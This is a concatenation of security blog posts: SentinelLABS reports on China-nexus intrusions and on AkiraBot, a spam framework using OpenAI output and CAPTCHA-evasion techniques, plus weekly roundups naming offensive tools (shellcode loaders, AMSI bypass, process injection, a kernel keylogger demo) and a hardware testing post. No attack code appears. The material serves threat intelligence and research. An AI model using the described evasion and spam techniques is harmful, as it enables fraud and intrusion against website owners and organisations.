Over the course of months, SentinelLABS observed the threat actor conduct many intrusions, including into a South Asian government supporting entity, providing IT solutions and infrastructure across multiple sectors. This activity involved extensive infrastructure, some of which we associate with an operational relay box (ORB) network, and a Windows backdoor that we track as GoReShell. The backdoor is implemented in the Go programming language and uses functionalities from the open-source reverse_ssh tool to establish reverse SSH connections to attacker-controlled endpoints.

SentinelLABS collectively tracks these activities under the PurpleHaze moniker. We assess with high confidence that PurpleHaze is a China-nexus actor, loosely linking it to APT15 (also known as Nylon Typhoon, or other various outdated aliases). This adversary is known for its global targeting of critical infrastructure sectors, such as telecommunications, information technology, and government organizations – victimology that aligns with our multiple encounters with PurpleHaze.

We track the ORB network infrastructure observed in the attack against the South Asian government organization as being operated from China and actively used by several suspected Chinese cyberespionage actors, including APT15. The use of ORB networks is a growing trend among these threat groups, since they can be rapidly expanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their attribution challenging. Additionally, GoReShell malware and its variations, including the deployment mechanism on compromised machines and obfuscation techniques have been exclusively observed in intrusions that we attribute with high confidence to China-nexus actors.

ShadowPad Intrusions

In June 2024, approximately four months prior to PurpleHaze targeting SentinelOne, SentinelLABS observed threat actor activity targeting the same South Asian government entity that was also targeted in October 2024. Among the retrieved artifacts, we identified samples of ShadowPad, a modular backdoor platform used by multiple suspected China-nexus threat actors to conduct cyberespionage. Recent ShadowPad activity has also included the deployment of ransomware, though the motive remains unclear β€” whether for financial gain or as a means of distraction, misattribution, or removal of evidence.

The ShadowPad samples we retrieved were obfuscated using ScatterBrain, an evolution of the ScatterBee obfuscation mechanism. Our industry partner, Google Threat Intelligence Group (GTIG), have also observed the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attribute them to clusters associated with the suspected Chinese APT actor, APT41.

GTIG APT41 Use of ScatterBrain
GTIG APT41 Use of ScatterBrain

Investigations continue in determining the specific actor overlap between June 2024 ShadowPad intrusions and the later PurpleHaze activity. We do not rule out the involvement of the same threat cluster, particularly given the extensive sharing of malware, infrastructure, and operational practices among Chinese threat groups, as well as the possibility of access transfer between different actors.

Based on private telemetry, we identified a large collection of victim organizations compromised using ScatterBrain-obfuscated ShadowPad. Between July 2024 and March 2025, this malware was used in intrusions at over 70 organizations across various regions globally, spanning sectors such as manufacturing, government, finance, telecommunications, and research. We assess that the threat actor primarily gained initial foothold in the majority of these organizations by exploiting an n-day vulnerability in CheckPoint gateway devices, which aligns with previous research on ShadowPad intrusions involving the deployment of ransomware.

Among the victims, we identified the previously mentioned IT services and logistics organization that was at the time responsible for managing hardware logistics for SentinelOne employees. Victim organizations were promptly informed of intrusion specifics, which were swiftly investigated. At this point, it remains unclear whether the perpetrators’ focus was solely on the compromised organization or if they intended to extend their reach to client organizations as well.

A detailed investigation into SentinelOne’s infrastructure, software, and hardware assets found no evidence of secondary compromise. Nevertheless, this case underscores the fragility of the larger supplier ecosystem that organizations depend upon and the persistent threat posed by suspected Chinese threat actors, who continuously seek to establish strategic footholds to potentially compromise downstream entities.

SentinelLABS will share a detailed public release on this topic in due course, providing further technical information on these activities, including observed TTPs, malware, and infrastructure.

Lessons Learned While Hardening Our Operational Ecosystem

Our analysis of the PurpleHaze cluster, and more specifically the potential indirect risk introduced via compromised third-party service providers, has reinforced several key insights around operational security and supply chain monitoring. Even when our own infrastructure remained untouched, the targeting of an external service provider previously associated with business logistics surfaced important considerations.

One immediate reminder is the necessity of maintaining real-time awareness not only over internal assets but also over adjacent service providersβ€”particularly those with past or current access to sensitive employee devices or logistical information. When incidents occur near your supply chain, don’t wait for confirmation of compromise. Proactively trigger internal reviews of asset inventories, procurement workflows, OS images and onboarding deployment scripts, and segmentation policies to quickly identify any exposure pathways and reduce downstream risk.

This leads to several defense recommendations:

  • Distribute Threat Intelligence Across Operational Stakeholders
    Organizations should proactively share campaign-level threat intelligence with business units beyond the traditional security orgβ€”particularly those managing vendor relationships, logistics, and physical operations. Doing so enables faster detection of overlap with compromised third parties and supports early reassessment of exposure through external partners.
  • Integrate Threat Context Into Asset Attribution Workflows
    Infrastructure and IT teams should collaborate with threat intelligence functions to embed threat-aware metadata into asset inventories. This enables more responsive scoping during incident response and enhances the ability to trace supply chain touchpoints that may be at risk.
  • Expand Supply Chain Threat Modeling
    Organizations should refine their threat modeling processes to explicitly account for upstream supply chain threats, especially those posed by nation-state actors with a history of leveraging contractors, vendors, or logistics partners as indirect access vectors. Tailoring models to include adversary-specific tradecraft enables earlier identification of unconventional intrusion pathways.

While attribution continues to evolve and victim impact remains diverse, one thing is clear: well-resourced threat actors are increasingly leaning on indirect routes into enterprise environments. Investigations like this help us sharpen our defensesβ€”not just around traditional digital perimeters but around the full operational footprint of our organization.

The Strategic Value of Cyber Threat Intelligence

In today’s threat landscape, threat intelligence has evolved from a niche function into an essential pillar of enterprise defenseβ€”particularly for private sector organizations operating in the security space. As threat actors increasingly target security vendors for insider access, abuse of legitimate channels, and supply chain infiltration, the role of CTI in anticipating and disrupting these tactics has become more critical than ever.

One of the most tangible examples of this value is in internal talent acquisition and insider threat defense. Intelligence has become a frontline asset in identifying attempts by North Korean IT workers and other state-backed operatives to embed themselves in organizations under false pretenses. By flagging suspicious applicant patterns, cross-referencing alias histories, and tracking known tradecraft, CTI teams help hiring managers and HR avoid potential insider incidents before they start.

Our CTI capabilities must also directly support sales and channel operations. As criminal groups increasingly impersonate legitimate businesses to acquire security products through trusted resellers, intelligence plays a key role in verifying customer legitimacy and identifying anomalous purchase behaviors. By integrating intelligence insights into pre-sale vetting workflows, a crucial layer of protection is helping to ensure adversaries cannot simply β€œbuy” their way into our technology stack.

Internally, threat intelligence informs and enhances how we defend our own technology and supply chain against highly targeted APT activity. From understanding how adversaries reverse-engineer our software to uncovering which parts of our technology stack they seek to compromise, CTI enables proactive hardening, smarter telemetry prioritization, and meaningful collaboration with product and engineering teams. In essence, intelligence acts as an early-warning system and a strategic guideβ€”ensuring our defenses stay one step ahead of evolving threats.

Across every functionβ€”whether it’s HR, Sales, Engineering, or Securityβ€”cyber threat intelligence is no longer a backroom function. It’s embedded in the fabric of how we defend, operate, and grow as a business.

AkiraBot | AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale

9 April 2025 at 15:00

Executive Summary

  • AkiraBot is a framework used to spam website chats and contact forms en masse to promote a low-quality SEO service.
  • SentinelLABS assesses that AkiraBot has targeted more than 400,000 websites and successfully spammed at least 80,000 websites since September 2024.
  • The bot uses OpenAI to generate custom outreach messages based on the purpose of the website.
  • The framework is modular and sophisticated compared to typical spam tools, employing multiple CAPTCHA bypass mechanisms & network detection evasion techniques.

Overview

Whenever a new form of digital communications becomes prevalent, actors inevitably adopt it for spam to try to profit from unsuspecting users. Email has been the perennial choice for spam delivery, but the prevalence of new communications platforms has expanded the spam attack surface considerably.

This report explores AkiraBot, a Python framework that targets small to medium sized business website contact forms and chat widgets. AkiraBot is designed to post AI-generated spam messages tailored to the targeted website’s content that shill the services for a dubious Search Engine Optimization (SEO) network. The use of LLM-generated content likely helps these messages bypass spam filters, as the spam content is different each time a message is generated. The framework also rotates which attacker-controlled domain is supplied in the messages, further complicating spam filtering efforts.

The bot creator has invested significant effort into evading CAPTCHA filters as well as avoiding network detections by relying on a proxy service generally marketed towards advertisers–though the service has had considerable interest and use by cybercriminal actors.

AkiraBot is not related to the ransomware group Akira; this name was chosen due to the bot’s consistent use of domains that use β€œAkira” as the SEO service brand.

Script Execution and Website Feature Targeting

SentinelLABS identified several archives containing scripts related to this framework with file timestamps dating back to September 2024. The oldest archive refers to the bot as Shopbot, likely a reference to its targeting of websites using Shopify. As the tool evolved, the targeting expanded to include websites built using GoDaddy and Wix, as well as generic website contact forms, which includes websites built using Squarespace, and likely other technologies. These technologies are primarily used by small- to medium-sized businesses for their ease in enabling website development with integrations for eCommerce, website content management, and business service offerings.

There are many versions of this tool with file timestamps in the archives indicating activity between September 2024 to present. Each version uses one of two hardcoded OpenAI API keys and the same proxy credentials and test sites, which links the archives despite the disparate naming conventions. We identified AkiraBot-related archives that had the following root directory names:

  • bubble_working_clone
  • fingerprints-server
  • GoDaddy
  • NextCaptcha and FastCaptcha
  • NextCaptchaBot-v6
  • override
  • petar_bot
  • shopbotpyv2
  • SHOPIFY_SYSTEM_UPDATED
  • updatedpybot
  • wix
  • wixbot
  • WORKING_FOLDER

Additionally, logs from the tool reveal that the operator ran it from the following paths, suggesting that they are most likely using Windows Server systems based on the Administrator username being the most prevalent:

 	C:/Users/Administrator/Desktop/
 	C:/Users/Administrator/Downloads/
 	C:/Users/Usuario/Desktop/ - only appears in the archive named GoDaddy

Originally, AkiraBot spammed website contact forms enticing the site owner to purchase SEO services. Newer versions of AkiraBot have also targeted the Live Chat widgets integrated into many websites, including Reamaze widgets.

_submit_old_website function in v14.py
_submit_old_website function in v14.py

The bot has a GUI that shows success metrics and lets the operator choose a target list to run against. The GUI lets the operator customize how many threads are running at once, a feature the bot uses to target many sites concurrently.

AkiraBot GUI
AkiraBot GUI

Spam Message Generation

Searching for websites referencing AkiraBot domains shows that the bot previously spammed websites in a way that the message was indexed by search engines.

Google search results containing useakira[.]com
Google search results containing useakira[.]com
Spam comment on website from 2023 and content from AkiraBot templates.txt file
Spam comment on website from 2023 and content from AkiraBot templates.txt file

AkiraBot creates custom spam messages for targeted websites by processing a template that contains a generic outline of the type of message the bot should send.

Spam message template
Spam message template

The template is processed by a prompt sent to the OpenAI chat API to generate a customized outreach message based on the contents of the website. The OpenAI client uses model gpt-4o-mini and is assigned the role β€œYou are a helpful assistant that generates marketing messages.” and the prompt instructs the LLM to replace the variables <WEBSITE_NAME> and <KEYWORD> with the site name provided at runtime.

AI Chat prompt from v10.py
AI Chat prompt from v10.py

The <KEYWORD> is generated by processing the {context} variable, which contains text scraped from the targeted website via BeautifulSoup, a library that transforms raw HTML code into human–or LLM–readable text.

AkiraBot generate_message function
AkiraBot’s generate_message function

The resulting message includes a brief description of the targeted website, making the message seem curated. The benefit of generating each message using an LLM is that the message content is unique and filtering against spam becomes more difficult compared to using a consistent message template which can trivially be filtered.

Logged AI-generated outreach messages in submissions.csv
Logged AI-generated outreach messages in submissions.csv

CAPTCHA Bypass & Network Evasion Techniques

CAPTCHA Bypass

AkiraBot puts significant emphasis on evading CAPTCHAs so that it can spam websites at scale. The targeted CAPTCHA services include hCAPTCHA and reCAPTCHA, including Cloudflare’s hCAPTCHA service in certain versions of the tool.

We identified an archive with files for CAPTCHA-related servers and browser fingerprints, which allow the bot’s web traffic to mimic a legitimate end user. The archives contain a fingerprint server that runs on the same system as the other AkiraBot tools and intercepts the website loading processes using Selenium WebDriver, an automation framework that simulates user browsing activity.

The inject.js script injects code into the targeted website’s Document Object Model (DOM) which enables the tool to modify how the website loads in real time and change behaviors. inject.js manipulates values in the session via a headless Chrome instance that makes the session appear like an end user’s browser to the webserver. The script modifies multiple browser attributes that webservers use to identify the nature of the browser viewing the website, including:

  • Audio Context and Voice engines, which are used to profile whether a session is headless or a real browser
  • Graphics rendering, including canvas and WebGL attributes
  • Installed fonts
  • Navigator objects, which provide a wealth of profiling information, such as browser type, operating system & architecture, geolocation, hardware details, languages installed, and browser privacy settings
  • System memory, storage, and CPU profile
  • Timezone

The bot uses several CAPTCHA bypassing services, including Capsolver, FastCaptcha, and NextCaptcha, which are failover services for when browser emulation is insufficient to interact with the targeted website.

FastCaptcha token generator function in v10.py
FastCaptcha token generator function in v10.py

AkiraBot also runs a headless Chrome instance to refresh values for Reamaze tokens periodically. Reamaze provides websites with customer support chat integrations, making this another targeted feature. The service also offers spam filters for chats on its platform, indicating that this is a known vector for spam attacks.

Reamaze token handling function
Reamaze token handling function

Network Evasion Techniques

AkiraBot uses many different proxy hosts to evade network detections and diversify the source of where its traffic comes from. In each archive SentinelLABS analyzed, AkiraBot used the SmartProxy service. SmartProxy’s website claims that its proxies are ethically sourced and that they provide data center, mobile, and residential proxies. Each version of the bot uses the same proxy credentials, suggesting the same actor is behind each iteration.

get_random_proxy function in The_NextCaptcha_Bot.py
get_random_proxy function in The_NextCaptcha_Bot.py

While SmartProxy is a service that seems to operate within legal boundaries, it is worth noting that it has regularly had the attention of cybercriminals. The BlackBasta ransomware leaks referenced an exchange of SmartProxy credentials, for example.

SmartProxy credentials from BlackBasta leaks
SmartProxy credentials from BlackBasta leaks

Logging & Success

AkiraBot logs its spam progress to submissions.csv, which sometimes includes the AI-generated spam message contents as well. The submissions.csv file from the January 2025 archives show more than 80,000 unique domains that were successfully spammed. The script also logs failed attempts in failed.txt and failed_old.txt. The January 2025 archives showed that only 11,000 domains had failed, including previous runs of the tool. We analyzed all submissions.csv files; deduplicating the results revealed that more than 420,000 unique domains were targeted in total.

Two versions of AkiraBot used a Telegram bot for logging success metrics. The scripts monitor.py and monitor_random.py would collect success metrics from the bot and post them to a Telegram channel via API.

Telegram sending functionality in monitor.py
Telegram sending functionality in monitor.py

Telegram Detail

The Telegram functionality, contained in the monitor.py and monitor_random.py scripts, is tied into proxy rotation and CAPTCHA defeat features contained within the bundled JavaScript file script.js.Β  The monitor.py script utilizes pyautogui to paste the contents of script.js into a browser developer console by scripting CTRL+SHIFT+J, followed by the paste command, eventually executing the JavaScript within the browser console.

pyautogui actions in monitor.py
pyautogui actions in monitor.py

The pasted and executed JavaScript is then responsible for attempting CAPTCHA refreshes and defeats on targeted URLs, reporting the status returned to a JSON file, stats.json. If a proxy rotation is required, to aid further in refreshing the CAPTCHA defeat attempts on a given URL, the monitor.py script handles this as well, rotating the used proxy though the iproxyonline service (fxdx[.]in).

Proxy rotation is generally enabled to avoid geographic or IP-based restrictions when repeatedly attempting to refresh and defeat CAPTCHAs. The Telegram status updates specifically report on proxy rotations and CAPTCHA submissions. Some versions of these scripts have the proxy rotation section commented out, indicating that it is an optional feature.

Telegram message submission + proxy rotation status in monitor.py
Telegram message submission + proxy rotation status in monitor.py

All of the analyzed monitor.py and monitor_random.py scripts contain the same Telegram token and chat_id combination.

 Telegram bot data in monitor.py
Telegram bot data in monitor.py

This Telegram chat_id is associated with the following Telegram user data:

(bot) username: htscasdasdadwoobot
Firstname: Shadow / hts
LastName: a_zarkawi
HTS Telegram bot referenced in monitor.py scripts
HTS Telegram bot referenced in monitor.py scripts

Infrastructure

The spam messages frequently rotate the domain used, likely in an attempt to avoid detection. The oldest domain in use is akirateam[.]com, which was registered in January 2022 on a Germany-based IP, 91.195.240[.]94, without further updates until March 2023. The second oldest domain is goservicewrap[.]com, which was registered in April 2024 and resolved to 86.38.202[.]110, a Hostinger IP in Cyprus.

Several AkiraBot domains have interesting connections through historical DNS activity. The subdomain mail.servicewrap-go[.]com briefly shared a CNAME record pointing to 77980.bodis[.]com, which is associated with various malicious activities, including a 2023 malvertising campaign. This domain also received communications from several Windows executable files that were detected as various banking trojans.

An odd relationship stood out in anchor links referencing 77980.bodis[.]com: the website unj[.]digital contained anchor links from December 2024 through February 2025 pointing to 77980.bodis[.]com. UNJ Digital’s website describes itself as a digital marketing and software development firm. The subdomain smtp.unj[.]digital also has a CNAME record pointing to 77980.bodis[.]com, fortifying a connection between these hosts. While the website now highlights offering digital content services, as of late 2024 the site showed a focus on increasing marketing revenue.

Screenshot of content on unj[.]digital circa October 2024
Screenshot of content on unj[.]digital circa October 2024
Screenshot of content on unj[.]digital circa March 2025
Screenshot of content on unj[.]digital circa March 2025

Akira and ServiceWrap SEO

AkiraBot uses two distinct themes in their SEO offering domain naming conventions: Akira and ServiceWrap. Reviews for both services on TrustPilot are similar: many 5-star reviews with similar, potentially AI-generated contents, and the occasional 1-star review complaining that the site is either a scam or has spammed the person leaving the review.

The 5-star reviews tend to follow a pattern where the reviewer has one previous review that was made 1-5 days before the Akira or ServiceWrap review. The review themes are very similar across these 5-star reviews, though the contents and structure are always unique. We believe the actor may be generating some fake reviews, though it is difficult to say with certainty.

Trustpilot review for servicewrapgo[.]com
Trustpilot review for servicewrapgo[.]com

Trustpilot review for useakira[.]com
Trustpilot review for useakira[.]com

Trustpilot review for useakira[.]com
Trustpilot review for useakira[.]com

Conclusion

AkiraBot is a sprawling framework that has undergone multiple iterations to integrate new spamming target technologies and evade website defenses. We expect this campaign to continue to evolve as website hosting providers adapt defenses to deter spam. The author or authors have invested significant effort in this bot’s ability to bypass commonly used CAPTCHA technologies, which demonstrates that the operators are motivated to violate service provider protections.

AkiraBot’s use of LLM-generated spam message content demonstrates the emerging challenges that AI poses to defending websites against spam attacks. The easiest indicators to block are the rotating set of domains used to sell the Akira and ServiceWrap SEO offerings, as there is no longer a consistent approach in the spam message contents as there were with previous campaigns selling the services of these firms.

SentinelLABS thanks the OpenAI security team for their collaboration and continued efforts in deterring bad actors from abusing their services. The OpenAI team shared the following response following their investigation:

β€œWe’re grateful to SentinelOne for sharing their research. Distributing output from our services for spam is against our policies. The API key involved is disabled, and we’re continuing to investigate and will disable any associated assets. We take misuse seriously and are continually improving our systems to detect abuse.”

Indicators of Compromise

Akira & ServiceWrap Domains
akirateam[.]com
beservicewrap[.]pro
firstpageprofs[.]com
getkira[.]info
go-servicewrap[.]com
gogoservicewrap[.]com
goservicewrap[.]com
joinnowkira[.]org
joinnowservicewraps[.]pro
joinservicewrap[.]com
joinuseakira[.]com
kiraone[.]info
letsgetcustomers[.]com
loveservice-wrap[.]com
mybkira[.]info
onlyforyoursite[.]com
searchengineboosters[.]com
service-wrap[.]com
servicewrap-go[.]com
servicewrap[.]pro
servicewrapgo[.]com
servicewrapone[.]com
theakirateam[.]com
toakira[.]pro
topservice-wrap[.]pro
topservicewrap[.]com
usekiara[.]com
useproakira[.]com
usethatakira[.]com
wantkiara[.]info
wearetherealpros[.]com
wejoinkir[.]vip
wethekira[.]shop
wetheservicewrap[.]pro

AkiraBot Tool Archive SHA-1
09ec44b6d3555a0397142b4308825483b479bf5a
0de065d58b367ffb28ce53bc1dc023f95a6d0b89
13de9fcd4e7c36d32594924975b7ef2b91614556
2322964ea57312747ae9d1e918811201a0c86e9c
253684ea43cb0456a6fec5728e1091ff8fcb27cf
36b4e424ce8082d7606bb9f677f97c0f594f254d
3a443c72995254400da30fe203f3fbf287629969
3a7cc815b921166006f31c1065dadfeb8d5190e6
4d24dd5c166fa471554ed781180e353e6b9642b7
51ec20e5356bbebd43c03faae56fca4c3bbe318e
55affc664472c4657c8534e0508636394eac8828
5620b527dfc71e2ee7efb2e22a0441b60fd67b84
5fde3180373c420cfa5cfdea7f227a1e1fe6936c
62e66bae4b892593009d5261d898356b6d0be3ef
6b65c296d9e1cda5af2f7dab94ce8e163b2a4ca8
6c56b986893dd1de83151510f4b6260613c5fbb9
6f342ff77cd43921210d144a403b8abb1e541a8b
7129194c63ae262c814da8045879aed7a037f196
71464c4f145c9a43ade999d385a9260aabcbf66d
730192b0f62e37d4d57bae9ff14ec8671fbf051e
769aa6ab69154ca87ccba0535e0180a985c21a0c
76aab3ab0f3f16cf30d7913ff767f67a116ff1e7
853fde052316be7887474996538b31f6ac0c3963
9d43494c6f87414c67533cce5ec86754311631fc
9f6ed2427e959e92eb1699024f457d87fa7b5279
aa72065673dc543e6bf627c7479bfe8a5e42a9c4
aac26242f4209bc59c82c8f223fcf2f152ce44bc
b643a1f2c4eb436db26763d5e2527f6bebe8bcbf
bbd754e36aee4702b9f20b90d509248945add4ea
cb194612ed003eaf8d8cf6ed3731f21f3edeb161
cc63ee921c29f47612096c34d6ee3ef244b33db2
e12c6911997d7c2af5550b7e989f1dc57b6733b8
eae675812c4274502051d6f2d36348f77a8464a0
f1c7c5d0870fd0abb7e419f2c2ba8df42fa74667
f2e71c9cbc4a18482a11ca3f54f2c958973360b4
fb7fdcc2fe11e95065a0ce9041348984427ca0f4

LABScon24 Replay | A Walking Red Flag (With Yellow Stars)

31 March 2025 at 13:00

APT40 used CTFs at Hainan University to recruit hackers and source software vulnerabilities for operations. Jiangsu MSS received vulnerabilities from the Tianfu Cup. iSoon hosted their own CTF before their files were leaked on Github. Chinese intelligence cutouts tried to pitch US participants at RealWorldCTF. The list goes on.

A diverse ecosystem of CTFs exists in China and it has, until now, been largely ignored. Since 2017 when the PRC government issued rules to bolster cybersecurity competitions, incorporate them into talent cultivation and training programs, and limit the amount of money to be paid out in rewards, China’s security ecosystem has launched more than 150 unique competitions. Including competitions that are held annually, the number of events since 2017 exceeds 400.

Not all these competitions are software vulnerability competitions like Tianfu Cupβ€”in fact, few are. Most are aimed at talent cultivation and recruiting, and many are hosted by the military, the intelligence services, or other arms of the state.

This talk explores the diversity of China’s CTF ecosystem, its major leagues and events, and the annual number of participants across society. It highlights competitions held expressly by the Ministry of State Security and the PLAβ€”delving into the competitions’ particulars. Defenders with appropriate CTI collection capabilities will better understand how to target their collection efforts on specific individuals in China.

About the Authors

Dakota Cary is a strategic advisory consultant at SentinelOne. His reports examine artificial intelligence and cybersecurity research at Chinese universities, the People’s Liberation Army’s efforts to automate software vulnerability discovery, and new policies to improve China’s cybersecurity-talent pipeline. Prior to SentinelOne, he was a research analyst at Georgetown University’s Center for Security and Emerging Technology on the CyberAI Project.

Eugenio Benincasa is a Senior Cyberdefense Researcher at the Center for Security Studies (CSS) at ETH Zurich. Prior to joining CSS, Eugenio worked as a Threat Analyst at the Italian Presidency of the Council of Ministers in Rome and as a Research Fellow at the think tank Pacific Forum in Honolulu, where he focused on cybersecurity issues. He also worked as a Crime Analyst at the New York City Police Department (NYPD).

About LABScon

This presentation was featured live at LABScon 2024, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLABS.

Keep up with all the latest on LABScon 2025 here.

Last Week in Security (LWiS) - 2025-04-21

By:Erik
22 April 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-04-14 to 2025-04-21.

News

  • [PDF] Disclosure of Cyber Security Breach and Data Exfiltration through DOGE Systems and Whistleblower/Witness Intimidation - A senior DevSecOps Engineer at the National Labor Relations Board ("NLRB") details what he saw as DOGE was granted access to NLRB systems. The evidence looks damning, whomever did these actions had high privileges, was exfiltrating a lot of data, and besides disabling logging, was pretty sloppy (smash and grab vs stealth). The use of correct credentials of a DOGE account from Russia (blocked by Geo-rules) just 15 minutes after the account was created is very strange. If we assume Russia had/has an active implant that pulled the credentials from a DOGE employee that created the account or was sent the credentials, why would they attempt to use them from Russia? The mix of high-level and amateur tradecraft doesn't make sense, but it wouldn't be the first time a Russian cyber actor forgot to turn on their VPN; it does happen. For a more editorialized version of the story, see: A whistleblower's disclosure details how DOGE may have taken sensitive labor data.
  • CISA extends funding to ensure 'no lapse in critical CVE services' - MITRE, a non-profit federally funded research and development center, created and has maintained the Common Vulnerability and Exposures (CVE) database for 25 years. They sent a letter on 2025-04-15 that stated their funding would expire the next day. This is highly unusual, as government contracts not set to have their "option periods" (additional years) funded are notified well in advance. As the letter was making headlines, late the night of the 15th CISA apparently "executed the option period" (funded at least one additional year). While technically you can wait until midnight of the day the contract expires to extend it, it's highly unusual. If MITRE hadn't sent the letter that caused headlines, would the funding have come? Either way, there is now a new CVE Foundation that may be able to take over if MITRE does lose funding.
  • La Liga: Blocking of Cloudflare IPs in Spain - The Spanish La Liga football league blocked Cloudflare IPs to prevent Spanish citizen from streaming football matches. The issue is, over 20% of the internet sits behind Cloudflare, so blocking all of Cloudflare's IPs took down a good chunk of the internet for Spain during football matches. This is a good reminder of why technically competent advisors are needed for government agencies and enforcement. Cloudflare is taking legal action to stop the blocking.

Techniques and Write-ups

Tools and Exploits

  • VECTR - A service container for Mythic C2 for interacting with SRA's VECTR.
  • waiting_thread_hijacking - Waiting Thread Hijacking - injection by overwriting the return address of a waiting thread.
  • koneko - Robust Cobalt Strike shellcode loader with multiple advanced evasion features.
  • FriendlyFireBOF - A BOF that suspends non-GUI threads for a target process or resumes them resulting in stealthy process silencing.
  • SourcePoint v4.0 - The popular C2 profile generator for Cobalt Strike has been updated to support the latest Cobalt Strike features.
  • bincrypter - Pack/Encrypt/Obfuscate ELF + SHELL scripts.
  • After days of struggle, my emulator now runs in the browser - 🀯 web assembly is getting wild. Source: emulator.
  • go-buena-clr - Good CLR Host with Native patchless AMSI Bypass.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • trufflehog-explorer - a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog.
  • dAWShund - Putting a leash on naughty AWS permissions.
  • cloud-snitch - Easy-to-use map visualization for AWS activity, inspired by Little Snitch for macOS.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-04-14

By:Erik
15 April 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-04-07 to 2025-04-14.

News

Techniques and Write-ups

Tools and Exploits

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

Last Week in Security (LWiS) - 2025-04-07

By:Erik
8 April 2025 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the past week. This post covers 2025-03-24 to 2025-04-07.

News

Techniques and Write-ups

Tools and Exploits

  • Loki - πŸ§™β€β™‚οΈ Node JS C2 for backdooring vulnerable Electron applications.
  • GhidraMCP - MCP Server for Ghidra.
  • BloodHound-MCP-AI - BloodHound-MCP-AI is integration that connects BloodHound with AI through Model Context Protocol, allowing security professionals to analyze Active Directory attack paths using natural language instead of complex Cypher queries.
  • roadrecon_mcp_server - Claude MCP server to perform analysis on ROADrecon data.
  • sharefiltrator - Tool for enumeration & bulk download of sensitive files found in SharePoint environments.
  • PatchGuardEncryptorDriver - An improved version of Patch Guard that I implemented, that includes integrity checks and other protection mechanisms I added.
  • blackcat - BlackCat is a PowerShell module designed to validate the security of Microsoft Azure. It provides a set of functions to identify potential security holes.
  • AzureFunctionRedirector - Code and tutorial on using Azure Functions as your redirector. Careful, Microsoft has been known to close subscriptions if they detect nefarious use.
  • Inline-EA - Cobalt Strike BOF for evasive .NET assembly execution.
  • FrogPost - postMessage Security Testing Tool.
  • NativeNtdllRemap - Remap ntdll.dll using only NTAPI functions with a suspended process.
  • NativeTokenImpersonate - Impersonate Tokens using only NTAPI functions.
  • KeyJumper - This project demonstrates arbitrary kernel code execution on a Windows 11 system with kCET enabled, to create a keylogging tool by mapping kernel memory to userland. You can find a blogpost about it here for more information.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

3D Printing Flying Probe Test Harnesses: Can you?

By:Sam
25 April 2025 at 17:51

Introduction

While testing a client's device, I found it included a castellated board with non-standard pitched castellations. I had a lot of trouble probing the castellated component with SensePeek PCBites and other styles of probes.

Printed Circuit Board with Castellated Edges

Whether due to falling over hours after being set, or being bumped out of place while setting a subsequent probe and ultimately shorting a voltage regulator and bricking a device, I became desperate for a better solution. Because of this frustration, I started tinkering with designing an assembly to hold the PCBites in place before remembering my stash of pogo pins and sleeves, and instead began designing a harness to hold pogo pins at the non-standard pitch for the target. While the test ended successfully before the need for that assembly, the idea stuck all the same.

What Are Probes (I’ll Keep This Brief).

Electronics are commonly tested at time of manufacture using a process called Flying Probe Testing. The probes used for these tests are manufactured in a variety of formats, but generally consist of a sleeve and spring loaded pin. In automated testing, these probes allow for some wiggle room in clearance when moving to contact circuit boards or components which might have varying dimensions.

Flying Test Probes

While suited quite well for their intended purpose, spring loaded test probes, or "pogo pins" have seen an increase in popularity over the last couple of decades. Uses range from small-run console modchips to charging station contacts to handheld testing probes. As implementations like these have hit the scene, they have spurred a lot of innovation.

514W+nvzmKS._AC_UF1000,1000_QL80_.jpg
IMG1.jpg.5249e2e6266c3355db19cb630f43b11c.jpg
168029943-origpic-e3696c.jpg

Why would we want to make our own?

The use case of interest for this project is the assembly of target-specific probe harnesses. While tools like sockets exist for various formats of components, such as flash chips or MCUs, the practice of designing custom System-on-Module (SoM) boards with castellated edges for mounting and connection to the main board has become more common, and there is generally no common socket for these types of boards.

In some cases, when such a board features a common pitch such as 2.54mm, it is possible to assemble sockets to suit them using special components such as Solder Party’s FlexyPin.

Castellated Board Mounted with FlexyPins

However, hardware designers do not always use standard pitch for board-to-board connections, even when using otherwise standard footprints for castellations.

Non-Standard Pitch or Depth Castellations

When encountering these patterns of design in hardware assessments, existing solutions such as PCBite, or generic air nozzle-based third-hand devices become cumbersome and self defeating. With each probe added, the chances of knocking an already bitten probe over increase, which could and has resulted in shorting components and bricking a test target. Obviously, this is something we would want to avoid when performing testing, especially on a client's dime and time.

For cases such as these, the appeal of designing a probe harness is significant, however, acquiring such a harness is very likely impossible. Even when clients can provide engineering or debug builds of products, it is very uncommon for them to have it in their contract for their manufacturer to also provide them one of their own flying probe assemblies, and even less likely that the assembly would be designed to contact all traces from a given major component in the first place.

The advent of affordable 3D printers begs the question of whether it may be possible to design and manufacture test probe harnesses for uncommon targets in-situ. In this post we will go through some approaches taken to try to answer this question, including what did not work and what might work better next time.

SLA vs. FDM and the Expected Challenges of the Latter

While SLA (Stereolithography Apparatus) printers seem quite well suited to this purpose, they are also expensive to operate and messy. I personally do not own an SLA printer for these reasons, and order out for resin prints when I want them. This, however, takes weeks usually! FDM (Fused Deposition Modeling) Printers are cheap, widely available, and the materials they consume are also quite affordable.

